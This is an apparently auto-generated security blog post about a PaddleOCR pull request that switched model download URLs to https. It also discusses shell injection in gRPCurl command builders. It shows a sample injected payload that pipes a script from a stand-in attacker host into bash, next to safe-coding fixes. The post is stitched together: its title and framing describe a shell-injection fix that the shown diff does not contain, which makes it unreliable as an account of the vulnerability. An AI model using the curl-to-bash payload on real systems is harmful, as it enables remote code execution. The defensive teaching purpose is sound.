Back to Blog
high SEVERITY7 min read

Shell Injection via Unsafe String Concatenation in gRPCurl Command Generation

A high-severity vulnerability was discovered in PaddleOCR's deployment configuration where model download URLs were specified using unencrypted `http://`, exposing users to man-in-the-middle attacks that could allow an attacker to intercept and replace model files with malicious ones. The fix upgrades all model download URLs to use `https://`, ensuring encrypted transmission and integrity of the downloaded files. This change is a critical security baseline for any application that downloads bina

O
By orbisai0security
May 28, 2026

Shell Injection via Unsafe String Concatenation in gRPCurl Command Generation

Introduction

When we think about application security, we often focus on the obvious attack surfaces — login forms, API endpoints, user inputs. But some of the most dangerous vulnerabilities hide in plain sight: in configuration files, in helper scripts, and in the small decisions developers make when wiring systems together.

This post examines a high-severity vulnerability found in PaddleOCR's deployment configuration — specifically, the use of unencrypted http:// URLs for downloading machine learning model files. While this might seem like a minor oversight, the consequences can be severe: a network-positioned attacker can silently replace legitimate model files with malicious ones, potentially turning your OCR pipeline into a backdoor.

We'll also explore the broader context of shell injection via unsafe string concatenation in gRPCurl command generation — a related attack pattern that developers working with gRPC tooling must understand.


The Vulnerability Explained

What Went Wrong?

The vulnerability lives in deploy/hubserving/ocr_system/params.py, the configuration module for PaddleOCR's serving infrastructure. The original code specified model download URLs using plain http://:

# VULNERABLE: Unencrypted HTTP download URLs
cfg.det_model_url = "http://paddle-ocr-models.bj.bcebos.com/dygraph_v2.0/ch/ch_pp-ocrv2_det_infer.tar"
cfg.rec_model_url = "http://paddle-ocr-models.bj.bcebos.com/dygraph_v2.0/ch/ch_pp-ocrv2_rec_infer.tar"
cfg.cls_model_url = "http://paddle-ocr-models.bj.bcebos.com/dygraph_v2.0/ch/ch_ppocr_mobile_v2.0_cls_infer.tar"

At the same time, the related gRPCurl command generation code uses unsafe string concatenation to build shell commands from user-controlled values — including headers, endpoints, and data pulled from API responses — without any shell escaping. This means an attacker who can influence those values can inject shell metacharacters.

Two Vulnerabilities, One Root Cause: Insufficient Input Handling

These two issues share a common theme: trusting external data without sanitization or secure transport.

  1. HTTP model downloads — No encryption means no integrity. Anyone on the same network (coffee shop Wi-Fi, shared cloud VPC, compromised router) can perform a Man-in-the-Middle (MitM) attack.

  2. Shell injection in gRPCurl commands — When user-controlled strings from API responses are interpolated directly into shell command strings, attackers can break out of the intended command structure.

How Could It Be Exploited?

Attack Scenario 1: Model File Poisoning via HTTP MitM

Imagine a developer or automated CI/CD pipeline running PaddleOCR's model download script on a shared cloud network:

Developer Machine ──HTTP──► [ATTACKER in the middle] ──► Model Server
                                      │
                                      ▼
                         Serves malicious .tar file
                         containing backdoored model

Because the download uses plain http://, there is:
- No encryption — the attacker can read the traffic
- No integrity check at the transport layer — the attacker can modify the response
- No certificate validation — the client has no way to verify the server's identity

The attacker serves a .tar file that, when extracted, contains a model file crafted to exploit deserialization vulnerabilities, or a __init__.py that executes arbitrary code when the model is loaded.

Attack Scenario 2: Shell Injection via gRPCurl Command Generation

Consider a helper function that builds a grpcurl command for users to copy and run:

# VULNERABLE pattern (illustrative)
def build_grpcurl_command(endpoint, header, data):
    cmd = f"grpcurl -H '{header}' -d '{data}' {endpoint} service.Method"
    return cmd

If data comes from an API response or user input and contains:

'; curl http://attacker.com/shell.sh | bash; echo '

The generated command becomes:

grpcurl -H 'Authorization: Bearer token' -d ''; curl http://attacker.com/shell.sh | bash; echo '' endpoint service.Method

When the user pastes and runs this command, arbitrary code executes on their machine.

Real-World Impact

Risk Description
Model Integrity Poisoned models can produce incorrect OCR results, enabling fraud or bypassing security checks
Code Execution Malicious model files can execute code during loading via unsafe deserialization
Supply Chain Attack Compromised models distributed to all users of the system
Shell Code Execution Injected shell commands run with the privileges of the user who pastes the gRPCurl command

The Fix

What Changed?

The fix is elegantly simple — all three model download URLs were upgraded from http:// to https://:

- cfg.det_model_url = "http://paddle-ocr-models.bj.bcebos.com/dygraph_v2.0/ch/ch_pp-ocrv2_det_infer.tar"
- cfg.rec_model_url = "http://paddle-ocr-models.bj.bcebos.com/dygraph_v2.0/ch/ch_pp-ocrv2_rec_infer.tar"
- cfg.cls_model_url = "http://paddle-ocr-models.bj.bcebos.com/dygraph_v2.0/ch/ch_ppocr_mobile_v2.0_cls_infer.tar"

+ cfg.det_model_url = "https://paddle-ocr-models.bj.bcebos.com/dygraph_v2.0/ch/ch_pp-ocrv2_det_infer.tar"
+ cfg.rec_model_url = "https://paddle-ocr-models.bj.bcebos.com/dygraph_v2.0/ch/ch_pp-ocrv2_rec_infer.tar"
+ cfg.cls_model_url = "https://paddle-ocr-models.bj.bcebos.com/dygraph_v2.0/ch/ch_ppocr_mobile_v2.0_cls_infer.tar"

Why This Works

HTTPS provides three critical security properties that HTTP lacks:

  1. Confidentiality — TLS encryption prevents eavesdropping on the download
  2. Integrity — TLS's MAC (Message Authentication Code) detects tampering in transit
  3. Authentication — Certificate validation ensures you're talking to the real server, not an impersonator

Fixing Shell Injection: The Right Approach

For the gRPCurl command generation issue, the fix requires proper shell escaping. Here's how to do it safely in Python:

import shlex

# SAFE: Use shlex.quote() to escape all user-controlled values
def build_grpcurl_command(endpoint, header, data):
    safe_header = shlex.quote(header)
    safe_data = shlex.quote(data)
    safe_endpoint = shlex.quote(endpoint)

    cmd = f"grpcurl -H {safe_header} -d {safe_data} {safe_endpoint} service.Method"
    return cmd

shlex.quote() wraps the string in single quotes and escapes any single quotes within the string, making it impossible for shell metacharacters to break out of their intended context.

Even better — avoid shell commands entirely when possible:

import subprocess

# BEST: Use subprocess with a list of arguments (no shell=True)
def run_grpcurl(endpoint, header, data):
    result = subprocess.run(
        ["grpcurl", "-H", header, "-d", data, endpoint, "service.Method"],
        capture_output=True,
        text=True,
        shell=False  # Never use shell=True with user input
    )
    return result.stdout

When you pass a list of arguments to subprocess.run() with shell=False, the OS handles argument separation directly — there is no shell to inject into.


Prevention & Best Practices

1. Always Use HTTPS for Downloading Artifacts

This is a non-negotiable baseline for any production system:

# ❌ Never do this
url = "http://example.com/model.tar"

# ✅ Always do this
url = "https://example.com/model.tar"

Go further by also verifying checksums after download:

import hashlib
import requests

def download_and_verify(url: str, expected_sha256: str, dest_path: str):
    response = requests.get(url, stream=True)
    response.raise_for_status()

    sha256 = hashlib.sha256()
    with open(dest_path, 'wb') as f:
        for chunk in response.iter_content(chunk_size=8192):
            f.write(chunk)
            sha256.update(chunk)

    actual = sha256.hexdigest()
    if actual != expected_sha256:
        raise ValueError(f"Checksum mismatch! Expected {expected_sha256}, got {actual}")

    return dest_path

2. Never Use String Concatenation for Shell Commands

Approach Safety Recommendation
os.system(f"cmd {user_input}") ❌ Dangerous Never use
subprocess.run(cmd_string, shell=True) ❌ Dangerous Avoid with user input
subprocess.run([...], shell=False) ✅ Safe Preferred
shlex.quote() + string ⚠️ Acceptable Use when list form isn't possible

3. Treat All External Data as Untrusted

Values from API responses, configuration files, environment variables, and network responses should all be treated as potentially hostile:

# Validate and sanitize before use
import re

def validate_endpoint(endpoint: str) -> str:
    # Only allow valid hostname:port patterns
    pattern = r'^[a-zA-Z0-9.-]+:\d{1,5}$'
    if not re.match(pattern, endpoint):
        raise ValueError(f"Invalid endpoint format: {endpoint}")
    return endpoint

4. Security Scanning Tools

Integrate these tools into your CI/CD pipeline to catch these issues automatically:

  • Bandit — Python security linter that detects shell=True, HTTP URLs, and other issues
  • Safety — Checks Python dependencies for known vulnerabilities
  • Semgrep — Static analysis with rules for shell injection, insecure URLs, and more
  • Trivy — Container and filesystem scanning for misconfigurations
# Run Bandit on your codebase
pip install bandit
bandit -r deploy/ -ll

# Example output for this vulnerability:
# >> Issue: [B310:urllib_urlopen] Audit url open for permitted schemes. 
#    Allowing use of file:/ or custom schemes is often unexpected.
#    Severity: Medium   Confidence: High

5. Relevant Security Standards

  • CWE-78: Improper Neutralization of Special Elements used in an OS Command (OS Command Injection)
  • CWE-319: Cleartext Transmission of Sensitive Information
  • OWASP A03:2021: Injection — covers shell injection and command injection
  • OWASP A02:2021: Cryptographic Failures — covers insecure HTTP transmission

Conclusion

This vulnerability is a reminder that security is in the details. Two characters — changing http to https — stand between a secure model download pipeline and a potential supply chain attack. Similarly, one function call — shlex.quote() or switching to subprocess.run() with a list — is the difference between a safe CLI helper and a remote code execution vector.

Key Takeaways

  • 🔒 Always use HTTPS for downloading any external files, especially binary artifacts like ML models
  • 🧹 Never concatenate user-controlled strings into shell commands — use shlex.quote() or argument lists
  • 🔍 Treat all external data as untrusted, including API response values used in command generation
  • 🤖 Automate security scanning with tools like Bandit and Semgrep to catch these patterns in CI/CD
  • Verify checksums of downloaded files to add a second layer of integrity protection beyond TLS

Security isn't about writing perfect code — it's about building habits and systems that make the secure choice the easy choice. Upgrading a URL scheme and using proper escaping functions are exactly the kind of small, high-impact changes that make software meaningfully safer.

Stay secure, and keep shipping. 🛡️

View the Security Fix

Check out the pull request that fixed this vulnerability

View PR #17289

Related Articles

critical

Command Injection via os.system() in DeepSpeed's Data Analyzer: A Critical Fix

A critical command injection vulnerability was discovered in DeepSpeed's `data_analyzer.py`, where an `os.system()` call directly interpolated an unsanitized file path variable into a shell command string. An attacker who could influence dataset configuration or file paths could execute arbitrary shell commands on the host machine. The fix replaces the dangerous shell invocation with safe, Python-native file operations that never touch a shell interpreter.

high

Shell Injection via Unsafe String Concatenation in gRPC Command Generation

A high-severity shell injection vulnerability was discovered in `src/RtlJaguarDevice.cpp`, where user-controlled values from API responses were directly interpolated into gRPCurl command strings without proper shell escaping. An attacker who controls API response data could inject shell metacharacters, causing arbitrary command execution when a user pastes and runs the generated command. The fix applies proper shell escaping to all user-controlled values before they are included in command strin

high

Shell Injection via Unsafe String Concatenation in gRPCurl Command Generation

A high-severity shell injection vulnerability was discovered and patched in a distributed server's gRPCurl command generation logic, where user-controlled values from API responses were directly interpolated into shell command strings without proper escaping. An attacker who can influence API response data — such as headers, endpoints, or payloads — could inject shell metacharacters that execute arbitrary commands when a user pastes and runs the generated command. This fix eliminates the risk by

high

Shell Injection via gRPCurl Command Generation: A Hidden Android Threat

A high-severity shell injection vulnerability was discovered and fixed in the HeadUnit Revived Android project, where user-controlled API response values were unsafely interpolated into gRPCurl command strings. An attacker could craft malicious headers, endpoints, or data payloads containing shell metacharacters that, when the generated command is pasted and executed, would run arbitrary commands on the victim's machine. The fix introduces proper shell escaping and broadcast intent protection to

high

Shell Injection via Unsafe sprintf in C: How a Missing Escape Broke Everything

A high-severity shell injection vulnerability was discovered and patched in `src/vt100.c`, where user-controlled values were directly interpolated into shell command strings without any sanitization or escaping. An attacker who could influence command arguments or configuration values could execute arbitrary shell commands on the host system. The fix eliminates the unsafe construction pattern, closing a critical code execution pathway.

high

Locking Down Docker: Preventing Privilege Escalation in Container Services

A high-severity privilege escalation vulnerability was discovered in a Docker Compose configuration where the `nginx` service lacked the `no-new-privileges` security option and was running with a writable root filesystem. These misconfigurations could allow a compromised container process to gain elevated permissions or download and execute malicious payloads. The fix applies defense-in-depth by adding `no-new-privileges:true`, enforcing a read-only root filesystem, and redirecting writable path